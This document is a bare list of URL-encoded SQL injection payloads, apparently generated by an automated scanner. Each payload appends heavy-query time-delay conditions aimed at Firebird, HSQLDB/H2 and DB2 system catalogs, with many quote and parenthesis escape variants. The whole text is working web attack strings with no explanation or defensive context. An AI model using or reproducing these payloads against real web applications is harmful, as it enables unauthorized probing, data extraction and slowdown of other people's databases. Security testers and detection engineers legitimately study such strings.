1234.5%22%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%283378%3D3378 1234.5%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%287663%3D7663 1234.5%29%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%287602%3D7602 1234.5%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27XuIU%27%3D%27XuIU 1234.5%27%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27breo%27%3D%27breo 1234.5%27%29%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27HSri%27%3D%27HSri 1234.5%27%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27tNpZ%27%3D%27tNpZ 1234.5%27%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27UqBP%27%20LIKE%20%27UqBP 1234.5%27%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27kNJr%27%20LIKE%20%27kNJr 1234.5%27%29%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27RJNQ%27%20LIKE%20%27RJNQ 1234.5%27%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27bxlP%27%20LIKE%20%27bxlP 1234.5%22%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22OjBk%22%3D%22OjBk 1234.5%22%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22knvs%22%3D%22knvs 1234.5%22%29%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22rAdG%22%3D%22rAdG 1234.5%22%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22zcWz%22%3D%22zcWz 1234.5%22%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22RcfE%22%20LIKE%20%22RcfE 1234.5%22%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22PEpz%22%20LIKE%20%22PEpz 1234.5%22%29%29%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22fBrC%22%20LIKE%20%22fBrC 1234.5%22%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22YnKa%22%20LIKE%20%22YnKa 1234.5%29%20WHERE%204277%3D4277%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%29%20WHERE%208384%3D8384%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%20WHERE%205609%3D5609%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%22%20WHERE%206478%3D6478%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- 1234.5%27%20%7C%7C%20%28SELECT%208991%20FROM%20DUAL%20WHERE%203643%3D3643%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204427%20WHERE%208457%3D8457%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203705%20FROM%20DUAL%20WHERE%201921%3D1921%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 1234.5%20%2B%20%28SELECT%208718%20WHERE%209437%3D9437%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27cXOd%27%20FROM%20DUAL%20WHERE%205095%3D5095%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lROe%27%20WHERE%205091%3D5091%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208151%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%23 1234.5%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%22%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%285697%3D5697 1234.5%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%288424%3D8424 1234.5%29%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%284694%3D4694 1234.5%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27TQnx%27%3D%27TQnx 1234.5%27%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27XQgi%27%3D%27XQgi 1234.5%27%29%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27xgiO%27%3D%27xgiO 1234.5%27%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27RQcp%27%3D%27RQcp 1234.5%27%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27stxv%27%20LIKE%20%27stxv 1234.5%27%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27hTcU%27%20LIKE%20%27hTcU 1234.5%27%29%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27prbL%27%20LIKE%20%27prbL 1234.5%27%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%27HjLM%27%20LIKE%20%27HjLM 1234.5%22%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22bFTG%22%3D%22bFTG 1234.5%22%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22WZjA%22%3D%22WZjA 1234.5%22%29%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22FmPj%22%3D%22FmPj 1234.5%22%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22jNRr%22%3D%22jNRr 1234.5%22%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22TEJP%22%20LIKE%20%22TEJP 1234.5%22%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22KPUZ%22%20LIKE%20%22KPUZ 1234.5%22%29%29%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22hyum%22%20LIKE%20%22hyum 1234.5%22%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20AND%20%22hYhl%22%20LIKE%20%22hYhl 1234.5%29%20WHERE%206123%3D6123%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%29%20WHERE%207854%3D7854%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%20WHERE%203024%3D3024%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%22%20WHERE%207154%3D7154%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 1234.5%27%20%7C%7C%20%28SELECT%207995%20FROM%20DUAL%20WHERE%202175%3D2175%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203053%20WHERE%201570%3D1570%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206208%20FROM%20DUAL%20WHERE%206865%3D6865%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 1234.5%20%2B%20%28SELECT%202206%20WHERE%208204%3D8204%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27kJEM%27%20FROM%20DUAL%20WHERE%206920%3D6920%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FHRh%27%20WHERE%203017%3D3017%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29%20%23 1234.5%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%287380%3D7380 1234.5%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%288447%3D8447 1234.5%29%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%288758%3D8758 1234.5%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27iPWI%27%3D%27iPWI 1234.5%27%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27vmxB%27%3D%27vmxB 1234.5%27%29%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27ONaj%27%3D%27ONaj 1234.5%27%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27pKhP%27%3D%27pKhP 1234.5%27%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%27iRrQ%27%20LIKE%20%27iRrQ 1234.5%27%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%27PwBj%27%20LIKE%20%27PwBj 1234.5%27%29%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%27zJFj%27%20LIKE%20%27zJFj 1234.5%27%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%27xdkq%27%20LIKE%20%27xdkq 1234.5%22%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22vKnc%22%3D%22vKnc 1234.5%22%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22CRaw%22%3D%22CRaw 1234.5%22%29%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22GrcD%22%3D%22GrcD 1234.5%22%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22iwzL%22%3D%22iwzL 1234.5%22%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%22bIkz%22%20LIKE%20%22bIkz 1234.5%22%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%22IuvF%22%20LIKE%20%22IuvF 1234.5%22%29%29%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%28%28%28%22NNdI%22%20LIKE%20%22NNdI 1234.5%22%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20AND%20%22hRJu%22%20LIKE%20%22hRJu 1234.5%29%20WHERE%205895%3D5895%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20WHERE%207524%3D7524%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20WHERE%204041%3D4041%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20WHERE%201561%3D1561%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20%7C%7C%20%28SELECT%201750%20FROM%20DUAL%20WHERE%202447%3D2447%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207684%20WHERE%202572%3D2572%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204236%20FROM%20DUAL%20WHERE%206755%3D6755%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 1234.5%20%2B%20%28SELECT%204256%20WHERE%206839%3D6839%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27aihG%27%20FROM%20DUAL%20WHERE%203673%3D3673%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NQrg%27%20WHERE%207208%3D7208%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206147%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29--%20%23 1234.5%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%22%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%287981%3D7981 